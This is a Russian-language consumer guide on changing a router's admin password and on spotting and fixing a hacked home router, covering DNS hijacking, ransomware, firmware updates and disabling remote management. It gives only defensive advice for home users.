Шаг 3: перейдите на страницу администратора.

Найдите страницу с настройками администратора. Название страницы может быть похоже на:

• Администратор
• Администрация
• Настройки администратора

Перейдите на эту страницу, щелкнув соответствующие элементы меню и кнопки.

Шаг 4: В случае успеха откроется страница администратора вашего маршрутизатора.

Шаг 5: Выберите новый пароль.

Выбор нового пароля - очень важный шаг. Он защищает ваш маршрутизатор и домашнюю сеть от злоумышленников.

Не используйте общий пароль, такой как «пароль» или «qwerty».Выберите что-нибудь необычное, но все же запоминающееся. От этого зависит безопасность вашей сети.

Шаг 6: Измените пароль.

Шаг 1. Найдите место для ввода нового пароля - например, поле под названием «Новый пароль».

Шаг 2: При необходимости введите тот же пароль в другое поле под названием «Повторите новый пароль».

Шаг 3: Нажмите кнопку «Применить».

Шаг 7: запомните свой новый пароль.

Важной частью установки пароля является его запоминание. Маршрутизатор - это не типичный веб-сайт, который сбрасывает ваш пароль или отправляет вам подсказки, если вы его забудете. Если вы забыли пароль администратора маршрутизатора, единственный способ получить доступ к маршрутизатору - сбросить настройки маршрутизатора до заводских настроек по умолчанию.Это позволяет вам вернуться в маршрутизатор, но при этом перезаписываются все настройки маршрутизатора (например, настройка безопасности Wi-Fi). Вы должны повторить эти настройки.

При необходимости вы можете записать пароль вашего роутера. Тем не мение:

• Держите записанное подальше от посторонних глаз.
• Помните, где вы это записали! Запись чего-либо не поможет, если вы не можете найти, куда это положили.

Кроме того, вы можете сохранить свой пароль в диспетчере паролей. Менеджер паролей не только может помочь вам, создав пароль для вас, но и надежно сохранит пароль для вас, и вам не придется искать этот клочок бумаги. И, по всей вероятности, ваш менеджер паролей войдет на вашу страницу администратора WiFi за вас. Если вы планируете использовать менеджер паролей, мы рекомендуем использовать Sticky Password.

Шаг 8: повторно запустите RouterCheck.

Теперь, когда вы устранили проблему, снова запустите RouterCheck, чтобы убедиться, что вы действительно устранили проблему.

Как узнать, взломали ли кто-то ваш маршрутизатор и как это исправить

Убедитесь, что вы знаете, что делать, если ваша сеть взломана через маршрутизатор, и шаги, которые вы можете предпринять, чтобы решить эту проблему!

Не знаете, как узнать, взломал ли кто-то ваш роутер? Мы расскажем о некоторых типичных признаках «взломан роутер» и расскажем, как исправить взломанный роутер.Но сначала давайте рассмотрим, что такое маршрутизатор и какую роль он играет в вашем онлайн-мире.

похожи на указатели в Интернете - они направляют трафик по правильному пути. Подобно указателям с перекрестками улиц, маршрутизаторы размещаются между двумя или более частями Интернета. Итак, когда вы подключаетесь к «Wi-Fi» или «Интернету», на самом деле вы подключаетесь к маршрутизатору:

Все, что любое устройство в вашем доме делает «в Интернете», передается через ваш маршрутизатор. Итак, если хакер берет под свой контроль ваш маршрутизатор, он теоретически может видеть и / или контролировать все, что вы делаете в Интернете.

Маршрутизатор жизненно важен для правильной работы домашней сети и обработки конфиденциальных данных. Меньше всего вам хотелось бы, чтобы его взломали! Вот почему так важно знать, как узнать, взломал ли кто-то ваш маршрутизатор, и как исправить взломанный маршрутизатор.

Как взламывают маршрутизаторы?

Прежде чем мы углубимся в особенности знаков взлома маршрутизаторов, давайте рассмотрим, как именно маршрутизаторы взламываются.Ваш роутер можно взломать любым количеством способов. Двумя наиболее распространенными являются следующие:

Вы включили удаленное управление

Существует так называемое удаленное управление. Если вы включили удаленное управление, это означает, что вы можете получить доступ к своему маршрутизатору из удаленного места, подключившись через Интернет. Если удаленное управление включено, это может быть возможностью для хакера получить контроль над вашим маршрутизатором (подробнее об этом позже).

В вашей сети есть уязвимости

Уязвимости, такие как использование слабых паролей и наличие устаревшего программного обеспечения в прошивке маршрутизатора, могут быть еще одним способом для хакера получить контроль над вашим маршрутизатором.

В отчете Avast Threat Landscape 2019 Predictions Report исследование Avast показывает, что в 2018 году «60% пользователей во всем мире никогда не обновляли прошивку своих маршрутизаторов, что делает их потенциально уязвимыми для довольно простых атак, использующих уязвимости прошивки». Это говорит о том, что большинство людей не знают, как защитить свои маршрутизаторы, или даже не подозревают, что могло бы случиться, если бы они этого не сделали.

Что может случиться, если ваш маршрутизатор взломан

Как только хакер берет под свой контроль ваш маршрутизатор, все может быстро стать некрасивым…

• Хакеры могут украсть ваши данные - Как только хакер оказывается внутри, у него в значительной степени есть свободный диапазон, чтобы украсть те данные, которые им нужны.Это могут быть пароли, электронные письма, сообщения в социальных сетях и любые другие личные данные, которые вы размещаете в Интернете.
• Вы можете стать целью перехвата DNS - Хакеры также могут выполнять так называемый перехват DNS, который представляет собой атаку DNS, которая включает перенаправление пользователей на веб-сайты, на которые они не собирались переходить. Обычное место, куда хакер перенаправляет пользователя, - это фишинговый веб-сайт, замаскированный под веб-сайт, на который они собирались перейти. Если хакер проникнет в ваш маршрутизатор, он может перезаписать ваши настройки DNS и отправить вас куда захотят.
• Вы можете оказаться в зоне действия вредоносных программ и DDoS-атак - Хакеры могут внедрить фрагменты вредоносного кода (вредоносное ПО), которые могут поставить под угрозу всю вашу домашнюю сеть, или использовать ваш маршрутизатор в DDoS-атаке (распределенный отказ в обслуживании) . Это когда хакер использует сеть взломанных устройств для наводнения своей цели (обычно другой сети или веб-сайта), что блокирует доступ пользователей к ней.

Взломанные роутеры - не шутка. Например, в 2018 году ФБР выдало предупреждение о вредоносном ПО VPNFilter.В сообщении говорится, что иностранные киберпреступники «использовали вредоносное ПО VPNFilter для нацеливания на маршрутизаторы в небольших и домашних офисах». Вредоносная программа способна выполнять несколько функций, включая возможный сбор информации, использование устройства и блокировку сетевого трафика ». ФБР также предполагает, что вредоносное ПО было нацелено на маршрутизаторы, произведенные несколькими производителями, и в результате «скомпрометировало сотни тысяч домашних и офисных маршрутизаторов».

Как узнать, взломали ли кто-то ваш маршрутизатор

Несмотря на все эти разговоры о том, насколько опасен взломанный маршрутизатор, я уверен, вы задаетесь вопросом, на какие признаки следует обращать внимание, чтобы узнать, взломан ли ваш маршрутизатор.Вот несколько «признаков взлома маршрутизатора», на которые следует обратить внимание:

Ваши учетные данные не работают

Пароли внезапно перестают работать - это плохой знак. То же самое и с вашим роутером. Если ваш пароль Wi-Fi или логин в интерфейсе администратора вашего маршрутизатора не работают, это может быть признаком того, что хакер проник в ваш маршрутизатор и изменил его, чтобы заблокировать вас.

Вы замечаете неизвестные IP-адреса в своей сети

Если вы вошли в интерфейс своего маршрутизатора, вам следует регулярно проверять список IP-адресов, используемых в вашей сети. Если вы видите неизвестный адрес (особенно иностранный), это, скорее всего, означает, что хакер получил доступ к вашему маршрутизатору. Итак, для нашего следующего метода, как определить, был ли ваш маршрутизатор взломан, проверьте наличие неизвестных IP-адресов.

Вы перенаправлены на непредусмотренные или неизвестные веб-сайты

Возвращаясь к перехвату DNS и хакерам, перенаправляющим вас на опасные веб-сайты, о которых мы говорили минуту назад… это еще один признак взломанного маршрутизатора. Если вы пытаетесь посетить свой обычный раунд веб-сайтов, и вас постоянно перенаправляют на веб-сайты, которые вы не собирались посещать, это может быть признаком взломанного маршрутизатора с использованием перехвата DNS.

Вы получаете сообщения о программах-вымогателях

Хорошо, это последний пункт в нашем списке о том, как узнать, взломал ли кто-то ваш роутер. Программы-вымогатели - это тип вредоносного программного обеспечения, которое хакеры используют для прекращения доступа к вашим данным в обмен на вымогательство. Если хакер проник в ваш маршрутизатор, он может очень легко заблокировать доступ к вашей сети.

Но что вы будете делать, если получите электронное письмо или какой-либо другой вид связи от хакера с требованием оплаты в обмен на доступ к вашей сети? ФБР рекомендует не платить требование о выкупе и просит связаться с ближайшим к вам полевым отделением ФБР или сообщить об этом по подсказкам.fbi.gov.

Как исправить взломанный маршрутизатор за шесть простых шагов

Если вы заметили признаки взлома роутера, то наверняка захотите действовать быстро, чтобы исправить это. Вот шаги, которые вы должны предпринять, если считаете, что ваш роутер взломан.

Шаг 1. Отключитесь от Интернета

При отключении вашего маршрутизатора от Интернета хакер теряет возможность доступа к маршрутизатору, поскольку больше нет соединения.

Шаг 2. Сбросьте настройки маршрутизатора

Выполнив сброс настроек до заводских, ваш маршрутизатор сбросит ваши настройки и пароли.Это позволяет вам иметь дело с роутером с чистого листа. Прямо на маршрутизаторе должна быть кнопка физического сброса, которая поможет вам выполнить эту задачу.

Шаг 3. Измените пароли

После сброса настроек маршрутизатора войдите в интерфейс администратора маршрутизатора и сбросьте пароль. Обратите внимание, что при сбросе настроек маршрутизатора для вашей регистрационной информации будут восстановлены заводские настройки имени пользователя и пароля по умолчанию. На вашем маршрутизаторе должна быть наклейка с указанием учетных данных по умолчанию для справки.Кроме того, чтобы войти на страницу администратора вашего маршрутизатора, вы должны знать его IP-адрес.

При сбросе пароля убедитесь, что используете уникальный, длинный и сложный пароль, который также легко запомнить, например такую ​​фразу, как MyFavoriteEatery78910. Вам следует сбросить пароль для интерфейса администратора маршрутизатора и вашего домашнего Wi-Fi. Надеемся, что после выполнения этих первых трех шагов вы заблокируете хакера из своей сети.

Нужна помощь в создании надежного пароля? Вы можете проверить надежность любых создаваемых вами паролей с помощью такого инструмента, как проверка паролей security.org. Используя этот инструмент для проверки ключевой фразы «Mustard4Saltydogs», я получил следующий результат:

Шаг 4 - Свяжитесь с правоохранительными органами (при необходимости)

Это восходит к ситуации с программами-вымогателями. Программы-вымогатели - серьезное преступление, и с ними нужно бороться соответствующим образом.Независимо от того, можете ли вы войти и изменить свои пароли после сброса или нет, вы должны сообщить о преступлении. Помимо сообщения о преступлении, ФБР также рекомендует перезагрузить роутер, сбросить пароль и выполнить следующие несколько шагов из списка…

Шаг 5. Обновите прошивку

не всегда обновляются самостоятельно, поэтому важно обновлять прошивку вручную. Прошивка - это программное обеспечение, которое контролирует определенные аспекты оборудования вашего маршрутизатора. Обновления важны, поскольку они помогают исправлять уязвимости, которые могут стать основной целью для хакера, желающего вернуться в ваш маршрутизатор.

Шаг 6. Отключение удаленного управления

Удаленное управление позволяет получить доступ к вашей сети из удаленного места. Это довольно удобно, когда вы в отпуске или в путешествии, но эта функция также позволяет хакерам легко контролировать вашу сеть и компьютеры практически из любого места.

Если он включен и у хакера есть к нему доступ, это означает, что он может взять под контроль ваш рабочий стол и загружать, выгружать или делать практически все, что захотят. Выключи это!

Заключение о взломанных маршрутизаторах и решениях

Мы надеемся, что ответили на вопрос «как узнать, взломал ли кто-то ваш роутер?» Мы надеемся, что вам больше никогда не придется сталкиваться с проблемой взлома маршрутизатора, поскольку это может быть проблемой.Однако, если вы это сделаете, мы надеемся, что эти советы помогут вам справиться и удалить хакера из вашей сети.

По мере того, как вы двигаетесь вперед с более ориентированным на безопасность мышлением, есть еще несколько советов, которые вы должны реализовать, чтобы предотвратить получение хакером несанкционированного доступа в будущем:

• Регулярно меняйте пароль администратора роутера и пароли Wi-Fi.
• Постоянно обновляйте прошивку.
• Отслеживайте IP-адреса, указанные на странице администратора.